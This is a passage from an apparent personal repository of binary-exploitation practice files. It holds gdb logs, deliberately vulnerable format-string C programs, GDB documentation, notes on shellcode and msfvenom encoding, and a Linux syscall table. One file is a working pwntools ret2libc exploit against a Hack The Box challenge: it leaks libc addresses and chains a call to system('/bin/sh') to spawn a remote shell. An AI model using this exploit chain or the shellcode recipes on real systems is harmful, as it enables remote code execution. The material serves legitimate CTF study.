("AZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%w"...) 84 | [------------------------------------------------------------------------------] 85 | Legend: code, data, rodata, value 86 | Stopped reason: SIGSEGV 87 | 0x0000000000401618 in auth () 88 | gdb-peda$ x/xg $rsp 89 | 0x7fffffffe158: 0x416d41415141416c 90 | gdb-peda$ pattern_offset 0x416d41415141416c 91 | 4714496133718688108 found at offset: 135 92 | 93 | Checksec 94 | 95 | gdb-peda$ checksec 96 | CANARY : disabled 97 | FORTIFY : disabled 98 | NX : ENABLED 99 | PIE : disabled 100 | RELRO : Partial -------------------------------------------------------------------------------- /pwnage/examples/format_str/.gdb_history: -------------------------------------------------------------------------------- 1 | r asd 2 | r %x 3 | disass main 4 | break 0x0000555555555157 5 | break *0x0000555555555157 6 | r asd 7 | telescope 20 8 | disass main 9 | disass vuln 10 | break main 11 | r 12 | disass vuln 13 | break *0x000055555555514d 14 | c 15 | telescope 20 16 | break main 17 | r %x 18 | telescope 30 19 | -------------------------------------------------------------------------------- /pwnage/examples/format_str/a.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vergl4s/pentesting-dump/fea85de7d6ac3edf4c5a965b2e4e95f7689fd22f/pwnage/examples/format_str/a.out -------------------------------------------------------------------------------- /pwnage/examples/format_str/format0.c: -------------------------------------------------------------------------------- 1 | /* 2 | * phoenix/format-zero, by https://exploit.education 3 | * 4 | * Can you change the "changeme" variable? 5 | * 6 | * 0 bottles of beer on the wall, 0 bottles of beer! You take one down, and 7 | * pass it around, 4294967295 bottles of beer on the wall! 8 | */ 9 | 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | #define BANNER \ 17 | "Welcome to " LEVELNAME ", brought to you by https://exploit.education" 18 | 19 | int main(int argc, char **argv) { 20 | struct { 21 | char dest[32]; 22 | volatile int changeme; 23 | } locals; 24 | char buffer[16]; 25 | 26 | printf("%s\n", BANNER); 27 | 28 | if (fgets(buffer, sizeof(buffer) - 1, stdin) == NULL) { 29 | errx(1, "Unable to get buffer"); 30 | } 31 | buffer[15] = 0; 32 | 33 | locals.changeme = 0; 34 | 35 | sprintf(locals.dest, buffer); 36 | 37 | if (locals.changeme != 0) { 38 | puts("Well done, the 'changeme' variable has been changed!"); 39 | } else { 40 | puts( 41 | "Uh oh, 'changeme' has not yet been changed. Would you like to try " 42 | "again?"); 43 | } 44 | 45 | exit(0); 46 | } -------------------------------------------------------------------------------- /pwnage/examples/format_str/format1.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | 4 | int target; 5 | 6 | void vuln(char *string){ 7 | printf(string); 8 | if (target){ 9 | printf("Well done!"); 10 | } 11 | 12 | } 13 | 14 | 15 | int main(int argc, char **argv) { 16 | vuln(argv[1]); 17 | 18 | } -------------------------------------------------------------------------------- /pwnage/examples/ropme/.gdb_history: -------------------------------------------------------------------------------- 1 | disass main 2 | run 3 | offset_create 4 | help 5 | pattern_create 500 6 | run 7 | info registers rsp 8 | pattern_offset 0x7fffffffe188 9 | info registers rsp 10 | x/xg $rsp 11 | info registers $rsp 12 | info registers *rsp 13 | info registers $rsp 14 | x/xg $rsp 15 | pattern_offset 0x3441416541414941 16 | -------------------------------------------------------------------------------- /pwnage/examples/ropme/exploit.py: -------------------------------------------------------------------------------- 1 | import binascii 2 | from pwn import * 3 | import sys 4 | import time 5 | 6 | ELF_FILE = './ropme' 7 | LIBC_DB_EXE = '/opt/libc-database/' 8 | 9 | context(os='linux', arch='amd64') 10 | 11 | 12 | # p = process('./ropme') 13 | # elf = p.elf 14 | def find_libc(remote_addr, remote_port): 15 | p = remote(remote_addr, remote_port) 16 | elf = ELF(ELF_FILE) 17 | junk = "A"*72 18 | 19 | 20 | rop = ROP(elf) 21 | rop.search(regs=['rdi'], order='regs') 22 | rop.puts(elf.got['fflush']) 23 | rop.call(elf.symbols['main']) 24 | payload = junk + str(rop) 25 | p.recvuntil("ROP me outside, how 'about dah?") 26 | p.sendline(payload) 27 | p.recvline() 28 | leaked_fflush = p.recvline().rstrip().ljust(8, "\x00") 29 | 30 | 31 | rop = ROP(elf) 32 | rop.search(regs=['rdi'], order='regs') 33 | rop.puts(elf.got['puts']) 34 | rop.call(elf.symbols['main']) 35 | payload = junk + str(rop) 36 | p.recvuntil("ROP me outside, how 'about dah?") 37 | p.sendline(payload) 38 | p.recvline() 39 | leaked_puts = p.recvline().rstrip().ljust(8, "\x00") 40 | 41 | 42 | rop = ROP(elf) 43 | rop.search(regs=['rdi'], order='regs') 44 | rop.puts(elf.got['__libc_start_main']) 45 | rop.call(elf.symbols['main']) 46 | payload = junk + str(rop) 47 | p.recvuntil("ROP me outside, how 'about dah?") 48 | p.sendline(payload) 49 | p.recvline() 50 | leaked_libc_start_main = p.recvline().rstrip().ljust(8, "\x00") 51 | 52 | 53 | log.success("{} leaked fflush".format(binascii.hexlify(leaked_fflush))) 54 | log.success("{} leaked puts".format(binascii.hexlify(leaked_puts))) 55 | log.success("{} leaked __libc_start_main".format(binascii.hexlify(leaked_libc_start_main))) 56 | 57 | 58 | log.info("Trying to find the right libc") 59 | 60 | os.system("{}find fflush {} puts {} __libc_start_main {}".format(LIBC_DB_EXE, binascii.hexlify(leaked_fflush)[:2], binascii.hexlify(leaked_puts)[:2], binascii.hexlify(leaked_libc_start_main)[:2])) 61 | 62 | 63 | 64 | def pop(remote_addr, remote_port, elf_path, libc_path): 65 | p = remote(remote_addr, remote_port) 66 | elf = ELF(ELF_FILE) 67 | libc = ELF(libc_path) 68 | junk = "A"*72 69 | # gdb 70 | # pattern_create 500 71 | # x/xg $rsp 72 | # pattern_offset 0x3441416541414941 73 | # 3765362666600745281 found at offset: 71 74 | 75 | rop = ROP(elf) 76 | rop.search(regs=['rdi'], order='regs') 77 | rop.puts(elf.got['puts']) 78 | rop.call(elf.symbols['main']) 79 | payload = junk + str(rop) 80 | p.recvuntil("ROP me outside, how 'about dah?") 81 | p.sendline(payload) 82 | p.recvline() 83 | leaked_puts = p.recvline().rstrip().ljust(8, "\x00") 84 | log.info(leaked_puts) 85 | leaked_puts = u64(leaked_puts) 86 | leaked_base_address = leaked_puts - libc.symbols['puts'] 87 | libc.address = leaked_base_address 88 | 89 | time.sleep(2) 90 | 91 | rop2 = ROP(libc) 92 | # 93 | rop2.system(list(libc.search('/bin/sh\x00'))[0]-64) 94 | log.info("Stage 2 rop chain:\n"+rop2.dump()) 95 | payload = junk + str(rop2) 96 | 97 | 98 | p.recvuntil("ROP me outside, how 'about dah?") 99 | p.sendline(payload) 100 | 101 | p.sendline("ls") 102 | p.interactive() 103 | 104 | if __name__ == '__main__': 105 | # find_libc() 106 | 107 | # [*] Loaded cached gadgets for './ropme' 108 | # [+] a0c709e7267f0000 leaked fflush 109 | # [+] 90e609e7267f0000 leaked puts 110 | # [+] 40f704e7267f0000 leaked __libc_start_main 111 | # [*] Trying to find the right libc 112 | # ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64) 113 | # archive-glibc (id libc6_2.23-0ubuntu11_amd64) 114 | # a = ELF('./ropme') 115 | # libc=a.libc 116 | # # libc = ELF('/opt/libc-database/db/libc6_2.23-0ubuntu11_amd64.so') 117 | # addr = list(libc.search('/bin/sh\x00'))[0] 118 | # print(p64(int(addr))) 119 | 120 | pop('docker.hackthebox.eu', 35415, './ropme', '/opt/libc-database/db/libc6_2.23-0ubuntu11_amd64.so') 121 | -------------------------------------------------------------------------------- /pwnage/gdb_37.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debugging with GDB - Continuing and Stepping 6 | 7 | 8 | Go to the first, previous, next, last section, table of contents. 9 |

10 | 11 | 12 |

Continuing and stepping

13 | 14 |

15 | 16 | 17 | 18 | Continuing means resuming program execution until your program 19 | completes normally. In contrast, stepping means executing just 20 | one more "step" of your program, where "step" may mean either one 21 | line of source code, or one machine instruction (depending on what 22 | particular command you use). Either when continuing or when stepping, 23 | your program may stop even sooner, due to a breakpoint or a signal. (If 24 | it stops due to a signal, you may want to use handle, or use 25 | `signal 0' to resume execution. See section Signals.) 26 | 27 | 28 |

29 | 30 |
continue [ignore-count] 31 |
32 | 33 | 34 | 35 | 36 |
c [ignore-count] 37 |
38 |
fg [ignore-count] 39 |
40 | Resume program execution, at the address where your program last stopped; 41 | any breakpoints set at that address are bypassed. The optional argument 42 | ignore-count allows you to specify a further number of times to 43 | ignore a breakpoint at this location; its effect is like that of 44 | ignore (see section Break conditions). 45 | 46 | The argument ignore-count is meaningful only when your program 47 | stopped due to a breakpoint. At other times, the argument to 48 | continue is ignored. 49 | 50 | The synonyms c and fg (for foreground, as the 51 | debugged program is deemed to be the foreground program) are provided 52 | purely for convenience, and have exactly the same behavior as 53 | continue. 54 |
55 | 56 |

57 | To resume execution at a different place, you can use return 58 | (see section Returning from a function) to go back to the 59 | calling function; or jump (see section Continuing at a different address) to go to an arbitrary location in your program. 60 | 61 | 62 |

63 | A typical technique for using stepping is to set a breakpoint 64 | (see section Breakpoints, watchpoints, and catchpoints) at the 65 | beginning of the function or the section of your program where a problem 66 | is believed to lie, run your program until it stops at that breakpoint, 67 | and then step through the suspect area, examining the variables that are 68 | interesting, until you see the problem happen. 69 | 70 | 71 |

72 | 73 |
step 74 |
75 | 76 | 77 | 78 | Continue running your program until control reaches a different source 79 | line, then stop it and return control to GDB. This command is 80 | abbreviated s. 81 | 82 | 83 |
84 |

85 | Warning: If you use the step command while control is 86 | within a function that was compiled without debugging information, 87 | execution proceeds until control reaches a function that does have 88 | debugging information. Likewise, it will not step into a function which 89 | is compiled without debugging information. To step through functions 90 | without debugging information, use the stepi command, described 91 | below. 92 |

93 | 94 | The step command only stops at the first instruction of a source 95 | line. This prevents the multiple stops that could otherwise occur in 96 | switch statements, for loops, etc. step continues 97 | to stop if a function that has debugging information is called within 98 | the line. In other words, step steps inside any functions 99 | called within the line. 100 | 101 | Also, the step command only enters a function if there is line 102 | number information for the function. Otherwise it acts like the 103 | next command. This avoids problems when using cc -gl 104 | on MIPS machines. Previously, step entered subroutines if there 105 | was any debugging information about the routine. 106 | 107 |
step count 108 |
109 | Continue running as in step, but do so count times. If a 110 | breakpoint is reached, or a signal not related to stepping occurs before 111 | count steps, stepping stops right away. 112 | 113 | 114 | 115 |
next [count] 116 |
117 | Continue to the next source line in the current (innermost) stack frame. 118 | This is similar to step, but function calls that appear within 119 | the line of code are executed without stopping. Execution stops when 120 | control reaches a different line of code at the original stack level 121 | that was executing when you gave the next command. This command 122 | is abbreviated n. 123 | 124 | An argument count is a repeat count, as for step. 125 | 126 | The next command only stops at the first instruction of a 127 | source line. This prevents multiple stops that could otherwise occur in 128 | switch statements, for loops, etc. 129 | 130 | 131 |
set step-mode 132 |
133 | 134 | 135 |
set step-mode on 136 |
137 | The set step-mode on command causes the step command to 138 | stop at the first instruction of a function which contains no debug line 139 | information rather than stepping over it. 140 | 141 | This is useful in cases where you may be interested in inspecting the 142 | machine instructions of a function which has no symbolic info and do not 143 | want GDB to automatically skip over this function. 144 | 145 |
set step-mode off 146 |
147 | Causes the step command to step over any functions which contains no 148 | debug information. This is the default. 149 | 150 | 151 |
finish 152 |
153 | Continue running until just after function in the selected stack frame 154 | returns. Print the returned value (if any). 155 | 156 | Contrast this with the return command (see section Returning from a function). 157 | 158 | 159 | 160 |
until 161 |
162 |
u 163 |
164 | Continue running until a source line past the current line, in the 165 | current stack frame, is reached. This command is used to avoid single 166 | stepping through a loop more than once. It is like the next 167 | command, except that when until encounters a jump, it 168 | automatically continues execution until the program counter is greater 169 | than the address of the jump. 170 | 171 | This means that when you reach the end of a loop after single stepping 172 | though it, until makes your program continue execution until it 173 | exits the loop. In contrast, a next command at the end of a loop 174 | simply steps back to the beginning of the loop, which forces you to step 175 | through the next iteration. 176 | 177 | until always stops your program if it attempts to exit the current 178 | stack frame. 179 | 180 | until may produce somewhat counterintuitive results if the order 181 | of machine code does not match the order of the source lines. For 182 | example, in the following excerpt from a debugging session, the f 183 | (frame) command shows that execution is stopped at line 184 | 206; yet when we use until, we get to line 195: 185 | 186 | 187 | 
188 | (gdb) f
189 | #0  main (argc=4, argv=0xf7fffae8) at m4.c:206
190 | 206                 expand_input();
191 | (gdb) until
192 | 195             for ( ; argc > 0; NEXTARG) {
193 |
194 | 195 | This happened because, for execution efficiency, the compiler had 196 | generated code for the loop closure test at the end, rather than the 197 | start, of the loop--even though the test in a C for-loop is 198 | written before the body of the loop. The until command appeared 199 | to step back to the beginning of the loop when it advanced to this 200 | expression; however, it has not really gone to an earlier 201 | statement--not in terms of the actual machine code. 202 | 203 | until with no argument works by means of single 204 | instruction stepping, and hence is slower than until with an 205 | argument. 206 | 207 |
until location 208 |
209 |
u location 210 |
211 | Continue running your program until either the specified location is 212 | reached, or the current stack frame returns. location is any of 213 | the forms of argument acceptable to break (see section Setting breakpoints). This form of the command uses breakpoints, 214 | and hence is quicker than until without an argument. 215 | 216 | 217 | 218 |
stepi 219 |
220 |
stepi arg 221 |
222 |
si 223 |
224 | Execute one machine instruction, then stop and return to the debugger. 225 | 226 | It is often useful to do `display/i $pc' when stepping by machine 227 | instructions. This makes GDB automatically display the next 228 | instruction to be executed, each time your program stops. See section Automatic display. 229 | 230 | An argument is a repeat count, as in step. 231 | 232 | 233 | 234 |
nexti 235 |
236 |
nexti arg 237 |
238 |
ni 239 |
240 | Execute one machine instruction, but if it is a function call, 241 | proceed until the function returns. 242 | 243 | An argument is a repeat count, as in next. 244 |
245 | 246 |

247 | Go to the first, previous, next, last section, table of contents. 248 | 249 | 250 | -------------------------------------------------------------------------------- /pwnage/notes.txt: -------------------------------------------------------------------------------- 1 | ## GDB 2 | 3 | disass 4 | disass 5 | break * 6 | break 7 | stepi 8 | nexti 9 | telescope 20 10 | 11 | 12 | ## gcc 13 | 14 | gcc -fno-stack-protector -z execstack shellcode.c -o shellcode 15 | break *&code 16 | 17 | 18 | ## Tools 19 | 20 | ### Compile and link assembly code 21 | 22 | nasm -f elf64 file.nasm -o file.o 23 | ld file.o -o file 24 | 25 | ### Disassemble ELF 26 | 27 | objdump -M intel -D Exit.o 28 | objdump -M intel -D file -j .data 29 | 30 | ### To list function names from ELF 31 | 32 | nm -A file | grep -v -e GLIBC -e __ 33 | 34 | ### To get elf sections then specific section contents do 35 | 36 | readelf -S ./file 37 | readelf -p 25 ./file 38 | 39 | ### radare 40 | 41 | /R pop rdi 42 | 43 | list functions - afl 44 | move to functions - s 45 | disass function - pdf or pdb 46 | visual mode - V then p 47 | rewrite file - A (use mostly when on visual mode) 48 | 49 | 50 | find strings - rabin2 -z 51 | 52 | 53 | ## Resources 54 | 55 | shell-storm.org 56 | 57 | 58 | ## Unix System calls (video 06) 59 | 60 | Registers 61 | 62 | RAX - syscall number 63 | RDI - 1st arg 64 | RSI - 2nd arg 65 | RDX - 3rd arg 66 | R10 - 4th arg 67 | R8 - 5th 68 | R9 - 6th 69 | 70 | man 2 write 71 | 72 | ssize_t write(int fd, const void *buf, size_t count); 73 | 74 | http://blog.tinola.com/?e=5 75 | https://filippo.io/linux-syscall-table/ 76 | 77 | 78 | printf "#include \nSYS_read" | gcc -E - 79 | cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h 80 | 81 | ## Get binary shellcode in right format 82 | 83 | for i in $(objdump -d binary -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo 84 | 85 | ## String to reversed hex 86 | 87 | "/bin//sh"[::-1].encode('hex') 88 | 68732f2f6e69622f 89 | 90 | 91 | ## msf encoders 92 | 93 | echo -ne "shellcode" | msfvenom -f c -e x64/xor -a x64 --platform linux 94 | 95 | 96 | ## variable sizes 97 | 98 | byte 99 | word - 2 bytes 100 | double word - 4 bytes 101 | quad word - 8 bytes 102 | -------------------------------------------------------------------------------- /pwnage/registers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vergl4s/pentesting-dump/fea85de7d6ac3edf4c5a965b2e4e95f7689fd22f/pwnage/registers.png -------------------------------------------------------------------------------- /pwnage/syscalls.txt: -------------------------------------------------------------------------------- 1 | #ifndef _ASM_X86_UNISTD_64_H 2 | #define _ASM_X86_UNISTD_64_H 1 3 | 4 | #define __NR_read 0 5 | #define __NR_write 1 6 | #define __NR_open 2 7 | #define __NR_close 3 8 | #define __NR_stat 4 9 | #define __NR_fstat 5 10 | #define __NR_lstat 6 11 | #define __NR_poll 7 12 | #define __NR_lseek 8 13 | #define __NR_mmap 9 14 | #define __NR_mprotect 10 15 | #define __NR_munmap 11 16 | #define __NR_brk 12 17 | #define __NR_rt_sigaction 13 18 | #define __NR_rt_sigprocmask 14 19 | #define __NR_rt_sigreturn 15 20 | #define __NR_ioctl 16 21 | #define __NR_pread64 17 22 | #define __NR_pwrite64 18 23 | #define __NR_readv 19 24 | #define __NR_writev 20 25 | #define __NR_access 21 26 | #define __NR_pipe 22 27 | #define __NR_select 23 28 | #define __NR_sched_yield 24 29 | #define __NR_mremap 25 30 | #define __NR_msync 26 31 | #define __NR_mincore 27 32 | #define __NR_madvise 28 33 | #define __NR_shmget 29 34 | #define __NR_shmat 30 35 | #define __NR_shmctl 31 36 | #define __NR_dup 32 37 | #define __NR_dup2 33 38 | #define __NR_pause 34 39 | #define __NR_nanosleep 35 40 | #define __NR_getitimer 36 41 | #define __NR_alarm 37 42 | #define __NR_setitimer 38 43 | #define __NR_getpid 39 44 | #define __NR_sendfile 40 45 | #define __NR_socket 41 46 | #define __NR_connect 42 47 | #define __NR_accept 43 48 | #define __NR_sendto 44 49 | #define __NR_recvfrom 45 50 | #define __NR_sendmsg 46 51 | #define __NR_recvmsg 47 52 | #define __NR_shutdown 48 53 | #define __NR_bind 49 54 | #define __NR_listen 50 55 | #define __NR_getsockname 51 56 | #define __NR_getpeername 52 57 | #define __NR_socketpair 53 58 | #define __NR_setsockopt 54 59 | #define __NR_getsockopt 55 60 | #define __NR_clone 56 61 | #define __NR_fork 57 62 | #define __NR_vfork 58 63 | #define __NR_execve 59 64 | #define __NR_exit 60 65 | #define __NR_wait4 61 66 | #define __NR_kill 62 67 | #define __NR_uname 63 68 | #define __NR_semget 64 69 | #define __NR_semop 65 70 | #define __NR_semctl 66 71 | #define __NR_shmdt 67 72 | #define __NR_msgget 68 73 | #define __NR_msgsnd 69 74 | #define __NR_msgrcv 70 75 | #define __NR_msgctl 71 76 | #define __NR_fcntl 72 77 | #define __NR_flock 73 78 | #define __NR_fsync 74 79 | #define __NR_fdatasync 75 80 | #define __NR_truncate 76 81 | #define __NR_ftruncate 77 82 | #define __NR_getdents 78 83 | #define __NR_getcwd 79 84 | #define __NR_chdir 80 85 | #define __NR_fchdir 81 86 | #define __NR_rename 82 87 | #define __NR_mkdir 83 88 | #define __NR_rmdir 84 89 | #define __NR_creat 85 90 | #define __NR_link 86 91 | #define __NR_unlink 87 92 | #define __NR_symlink 88 93 | #define __NR_readlink 89 94 | #define __NR_chmod 90 95 | #define __NR_fchmod 91 96 | #define __NR_chown 92 97 | #define __NR_fchown 93 98 | #define __NR_lchown 94 99 | #define __NR_umask 95 100 | #define __NR_gettimeofday 96 101 | #define __NR_getrlimit 97 102 | #define __NR_getrusage 98 103 | #define __NR_sysinfo 99 104 | #define __NR_times 100 105 | #define __NR_ptrace 101 106 | #define __NR_getuid 102 107 | #define __NR_syslog 103 108 | #define __NR_getgid 104 109 | #define __NR_setuid 105 110 | #define __NR_setgid 106 111 | #define __NR_geteuid 107 112 | #define __NR_getegid 108 113 | #define __NR_setpgid 109 114 | #define __NR_getppid 110 115 | #define __NR_getpgrp 111 116 | #define __NR_setsid 112 117 | #define __NR_setreuid 113 118 | #define __NR_setregid 114 119 | #define __NR_getgroups 115 120 | #define __NR_setgroups 116 121 | #define __NR_setresuid 117 122 | #define __NR_getresuid 118 123 | #define __NR_setresgid 119 124 | #define __NR_getresgid 120 125 | #define __NR_getpgid 121 126 | #define __NR_setfsuid 122 127 | #define __NR_setfsgid 123 128 | #define __NR_getsid 124 129 | #define __NR_capget 125 130 | #define __NR_capset 126 131 | #define __NR_rt_sigpending 127 132 | #define __NR_rt_sigtimedwait 128 133 | #define __NR_rt_sigqueueinfo 129 134 | #define __NR_rt_sigsuspend 130 135 | #define __NR_sigaltstack 131 136 | #define __NR_utime 132 137 | #define __NR_mknod 133 138 | #define __NR_uselib 134 139 | #define __NR_personality 135 140 | #define __NR_ustat 136 141 | #define __NR_statfs 137 142 | #define __NR_fstatfs 138 143 | #define __NR_sysfs 139 144 | #define __NR_getpriority 140 145 | #define __NR_setpriority 141 146 | #define __NR_sched_setparam 142 147 | #define __NR_sched_getparam 143 148 | #define __NR_sched_setscheduler 144 149 | #define __NR_sched_getscheduler 145 150 | #define __NR_sched_get_priority_max 146 151 | #define __NR_sched_get_priority_min 147 152 | #define __NR_sched_rr_get_interval 148 153 | #define __NR_mlock 149 154 | #define __NR_munlock 150 155 | #define __NR_mlockall 151 156 | #define __NR_munlockall 152 157 | #define __NR_vhangup 153 158 | #define __NR_modify_ldt 154 159 | #define __NR_pivot_root 155 160 | #define __NR__sysctl 156 161 | #define __NR_prctl 157 162 | #define __NR_arch_prctl 158 163 | #define __NR_adjtimex 159 164 | #define __NR_setrlimit 160 165 | #define __NR_chroot 161 166 | #define __NR_sync 162 167 | #define __NR_acct 163 168 | #define __NR_settimeofday 164 169 | #define __NR_mount 165 170 | #define __NR_umount2 166 171 | #define __NR_swapon 167 172 | #define __NR_swapoff 168 173 | #define __NR_reboot 169 174 | #define __NR_sethostname 170 175 | #define __NR_setdomainname 171 176 | #define __NR_iopl 172 177 | #define __NR_ioperm 173 178 | #define __NR_create_module 174 179 | #define __NR_init_module 175 180 | #define __NR_delete_module 176 181 | #define __NR_get_kernel_syms 177 182 | #define __NR_query_module 178 183 | #define __NR_quotactl 179 184 | #define __NR_nfsservctl 180 185 | #define __NR_getpmsg 181 186 | #define __NR_putpmsg 182 187 | #define __NR_afs_syscall 183 188 | #define __NR_tuxcall 184 189 | #define __NR_security 185 190 | #define __NR_gettid 186 191 | #define __NR_readahead 187 192 | #define __NR_setxattr 188 193 | #define __NR_lsetxattr 189 194 | #define __NR_fsetxattr 190 195 | #define __NR_getxattr 191 196 | #define __NR_lgetxattr 192 197 | #define __NR_fgetxattr 193 198 | #define __NR_listxattr 194 199 | #define __NR_llistxattr 195 200 | #define __NR_flistxattr 196 201 | #define __NR_removexattr 197 202 | #define __NR_lremovexattr 198 203 | #define __NR_fremovexattr 199 204 | #define __NR_tkill 200 205 | #define __NR_time 201 206 | #define __NR_futex 202 207 | #define __NR_sched_setaffinity 203 208 | #define __NR_sched_getaffinity 204 209 | #define __NR_set_thread_area 205 210 | #define __NR_io_setup 206 211 | #define __NR_io_destroy 207 212 | #define __NR_io_getevents 208 213 | #define __NR_io_submit 209 214 | #define __NR_io_cancel 210 215 | #define __NR_get_thread_area 211 216 | #define __NR_lookup_dcookie 212 217 | #define __NR_epoll_create 213 218 | #define __NR_epoll_ctl_old 214 219 | #define __NR_epoll_wait_old 215 220 | #define __NR_remap_file_pages 216 221 | #define __NR_getdents64 217 222 | #define __NR_set_tid_address 218 223 | #define __NR_restart_syscall 219 224 | #define __NR_semtimedop 220 225 | #define __NR_fadvise64 221 226 | #define __NR_timer_create 222 227 | #define __NR_timer_settime 223 228 | #define __NR_timer_gettime 224 229 | #define __NR_timer_getoverrun 225 230 | #define __NR_timer_delete 226 231 | #define __NR_clock_settime 227 232 | #define __NR_clock_gettime 228 233 | #define __NR_clock_getres 229 234 | #define __NR_clock_nanosleep 230 235 | #define __NR_exit_group 231 236 | #define __NR_epoll_wait 232 237 | #define __NR_epoll_ctl 233 238 | #define __NR_tgkill 234 239 | #define __NR_utimes 235 240 | #define __NR_vserver 236 241 | #define __NR_mbind 237 242 | #define __NR_set_mempolicy 238 243 | #define __NR_get_mempolicy 239 244 | #define __NR_mq_open 240 245 | #define __NR_mq_unlink 241 246 | #define __NR_mq_timedsend 242 247 | #define __NR_mq_timedreceive 243 248 | #define __NR_mq_notify 244 249 | #define __NR_mq_getsetattr 245 250 | #define __NR_kexec_load 246 251 | #define __NR_waitid 247 252 | #define __NR_add_key 248 253 | #define __NR_request_key 249 254 | #define __NR_keyctl 250 255 | #define __NR_ioprio_set 251 256 | #define __NR_ioprio_get 252 257 | #define __NR_inotify_init 253 258 | #define __NR_inotify_add_watch 254 259 | #define __NR_inotify_rm_watch 255 260 | #define __NR_migrate_pages 256 261 | #define __NR_openat 257 262 | #define __NR_mkdirat 258 263 | #define __NR_mknodat 259 264 | #define __NR_fchownat 260 265 | #define __NR_futimesat 261 266 | #define __NR_newfstatat 262 267 | #define __NR_unlinkat 263 268 | #define __NR_renameat 264 269 | #define __NR_linkat 265 270 | #define __NR_symlinkat 266 271 | #define __NR_readlinkat 267 272 | #define __NR_fchmodat 268 273 | #define __NR_faccessat 269 274 | #define __NR_pselect6 270 275 | #define __NR_ppoll 271 276 | #define __NR_unshare 272 277 | #define __NR_set_robust_list 273 278 | #define __NR_get_robust_list 274 279 | #define __NR_splice 275 280 | #define __NR_tee 276 281 | #define __NR_sync_file_range 277 282 | #define __NR_vmsplice 278 283 | #define __NR_move_pages 279 284 | #define __NR_utimensat 280 285 | #define __NR_epoll_pwait 281 286 | #define __NR_signalfd 282 287 | #define __NR_timerfd_create 283 288 | #define __NR_eventfd 284 289 | #define __NR_fallocate 285 290 | #define __NR_timerfd_settime 286 291 | #define __NR_timerfd_gettime 287 292 | #define __NR_accept4 288 293 | #define __NR_signalfd4 289 294 | #define __NR_eventfd2 290 295 | #define __NR_epoll_create1 291 296 | #define __NR_dup3 292 297 | #define __NR_pipe2 293 298 | #define __NR_inotify_init1 294 299 | #define __NR_preadv 295 300 | #define __NR_pwritev 296 301 | #define __NR_rt_tgsigqueueinfo 297 302 | #define __NR_perf_event_open 298 303 | #define __NR_recvmmsg 299 304 | #define __NR_fanotify_init 300 305 | #define __NR_fanotify_mark 301 306 | #define __NR_prlimit64 302 307 | #define __NR_name_to_handle_at 303 308 | #define __NR_open_by_handle_at 304 309 | #define __NR_clock_adjtime 305 310 | #define __NR_syncfs 306 311 | #define __NR_sendmmsg 307 312 | #define __NR_setns 308 313 | #define __NR_getcpu 309 314 | #define __NR_process_vm_readv 310 315 | #define __NR_process_vm_writev 311 316 | #define __NR_kcmp 312 317 | #define __NR_finit_module 313 318 | #define __NR_sched_setattr 314 319 | #define __NR_sched_getattr 315 320 | #define __NR_renameat2 316 321 | #define __NR_seccomp 317 322 | #define __NR_getrandom 318 323 | #define __NR_memfd_create 319 324 | #define __NR_kexec_file_load 320 325 | #define __NR_bpf 321 326 | #define __NR_execveat 322 327 | #define __NR_userfaultfd 323 328 | #define __NR_membarrier 324 329 | #define __NR_mlock2 325 330 | #define __NR_copy_file_range 326 331 | #define __NR_preadv2 327 332 | #define __NR_pwritev2 328 333 | #define __NR_pkey_mprotect 329 334 | #define __NR_pkey_alloc 330 335 | #define __NR_pkey_free 331 336 | #define __NR_statx 332 337 | #define __NR_io_pgetevents 333 338 | #define __NR_rseq 334 339 | 340 | #endif /* _ASM_X86_UNISTD_64_H */ 341 | -------------------------------------------------------------------------------- /pwnage/x64 practice/.gdb_history: -------------------------------------------------------------------------------- 1 | nexti 2 | nexti 3 | nexti 4 | break 401031 5 | break 0x401031 6 | break *0x401031 7 | c 8 | nexti 9 | x/16xb $rsp-16 10 | break &*code 11 | break &code 12 | break *&code 13 | r 14 | nexti 15 | break *40104f 16 | break *0x40104f 17 | r 18 | disass maonm 19 | disass main 20 | disass _start 21 | break *0x004010a7 22 | c 23 | break *4010a7 24 | break *0x4010a7 25 | r 26 | nexti 27 | x/xs $rsp-8 28 | x/xs $rsp 29 | x/xs $rsp+8 30 | break *0x4010a9 31 | r 32 | nexti 33 | break *0x4010a9 34 | r 35 | nexti 36 | break *0x4010a9 37 | c 38 | nexti 39 | x/xs $rdi 40 | x/xs $rsi 41 | x/10xb $rsi 42 | x/12xb $rsi 43 | r 44 | c 45 | r 46 | c 47 | c 48 | c 49 | c 50 | c 51 | break *0x4010a9 52 | c 53 | nexti 54 | c 55 | break *0x4010a9 56 | c 57 | nexti 58 | disass 59 | disass _start 60 | break *0x000000000040102f 61 | r 62 | x/4x $rsp-4 63 | break *0x000000000040102f 64 | c 65 | r 66 | x/4x $rsp-4 67 | c 68 | break *0x000000000040102f 69 | r 70 | x/4x $rsp-4 71 | break *0x000000000040102f 72 | r 73 | x/4x $rsp-4 74 | break *0x401080 75 | r 76 | x/xs 0x4010d7 77 | x/xs rsi 78 | x/xs $rsi 79 | x/xs $r9 80 | c 81 | break *0x401080 82 | r 83 | nexti 84 | break *0x401080 85 | r 86 | nexti 87 | break *0x401080 88 | r 89 | lea [rsi] 90 | x/xs $rsi 91 | x/xs $r9 92 | c 93 | break *0x401080 94 | r 95 | c 96 | break *0x4010a6 97 | r 98 | break *0x4010a6 99 | r 100 | nexti 101 | next 102 | break *0x4010b6 103 | r 104 | x/xb $r9 105 | x/x $r9 106 | x/1x $r9 107 | x/1xb $r9 108 | break *0x4010b6 109 | r 110 | x/1xb $rdi+r9 111 | x/1xb $rdi+$r9 112 | break *0x4010b6 113 | r 114 | x/1xb $rdi+$r9 115 | x/1xb $rsi+$r9 116 | x/1xb $r8 117 | print $r8 118 | nexti 119 | break *&code 120 | r 121 | nexti 122 | break *&code 123 | r 124 | nexti 125 | break *&code 126 | r 127 | nexti 128 | disass 129 | 